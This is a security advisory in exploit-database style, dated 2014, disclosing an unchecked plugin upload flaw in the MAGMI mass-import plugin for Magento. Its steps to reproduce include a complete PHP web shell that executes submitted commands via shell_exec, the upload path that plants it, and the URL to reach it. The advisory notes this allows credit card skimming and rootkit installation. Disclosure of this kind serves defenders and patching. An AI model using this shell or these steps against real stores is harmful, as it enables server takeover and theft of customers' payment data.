Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion

Exploit found date:  10/24/2014
Security Researcher name:  Parvinder Bhasin
Contact info:  [email protected]
twitter:  @parvinderb - scorpio

Currently tested version:
Magento version:  Magento CE - 1.8 older
MAGMI version: v0.7.17a older

Download software link:
Magento server:  http://www.magentocommerce.com/download
MAGMI Plugin:
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/

MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability
(RFI) which allows an attacker to upload essentially any PHP file (without
any sanity checks).  This PHP file could then be used to skim credit card
data, rewrite files, run remote commands, delete files..etc.  Essentially,
this gives attacker ability to execute remote commands on the vulnerable
server.


Steps to reproduce:

1.  http://<a magentosite.com>/magmi/web/magmi.php
2.  Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped.  So create a php shell and
zip the file. ex: evil.php  ex: zip file: evil_plugin.zip.  After the file
has been uploaded, it will say:  Plugin packaged installed.
 evil.php:

 <?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>
      </form>";

    if(function_exists('shell_exec')) {
    $command=$_POST['command'];
    $output = shell_exec("$command");
    echo "<pre>$output</pre>";
   }
}
else {
  echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>
      </form>";
}
?>

3.  Your malicious evil.php file is extracted now.  All you then need to do
is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php
 At this point you could really have access to the entire system.  Download
any malware, install rootkits, skim credit card data ..etc.etc.